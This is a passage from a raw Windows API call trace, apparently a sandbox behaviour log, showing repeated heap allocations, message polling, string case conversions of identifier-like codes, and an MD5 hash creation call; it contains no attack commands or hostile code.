cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0189.425] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0189.425] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0189.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0189.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.426] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0189.426] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.426] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0189.426] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0189.426] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0189.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0189.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0189.426] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.426] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0189.426] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.426] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0189.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0189.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0189.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0189.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.427] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.427] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.427] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0189.427] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0189.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0189.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.427] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0189.427] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.427] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.427] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0189.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0189.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.428] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0189.428] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0189.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.428] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0189.428] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0189.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0189.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2412248 [0189.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0189.428] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.428] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0189.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.428] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.429] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.429] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.429] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0189.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.429] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0189.429] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0189.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0189.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.429] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.429] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0189.429] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.430] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0070 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0189.430] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0070 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0189.430] CryptCreateHash (in: hProv=0xaa3868, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa388 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0189.430] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0189.431] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0189.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0189.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0189.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0189.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0189.431] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0090 [0189.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0189.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0189.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0189.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0189.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0189.675] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.675] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2de8 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0189.676] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2d28 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0090 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0189.676] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.676] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2d28 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0189.677] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa760 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00b0 [0189.677] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0189.677] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0189.677] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0189.677] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0189.678] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.678] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00b0 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00e0 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa400 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00d0 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5c8 [0189.678] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00e0 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa580 [0189.678] CryptHashData (hHash=0xaa58e0, pbData=0x34a00a0, dwDataLen=0x3, dwFlags=0x1) returned 1 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.678] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0189.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa790 | out: hHeap=0x25c0000) returned 1 [0189.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa790 [0189.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0189.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0189.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0189.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0189.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa718 [0189.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0189.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0189.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0189.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0189.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0189.679] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0189.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466dd0 [0189.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1a0 [0189.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0189.679] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0189.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0189.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0189.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0189.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0189.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0189.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0189.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa730 [0189.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0189.680] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00d0 [0189.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0189.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0189.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0189.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0189.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0189.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0189.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0189.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0189.680] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0189.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 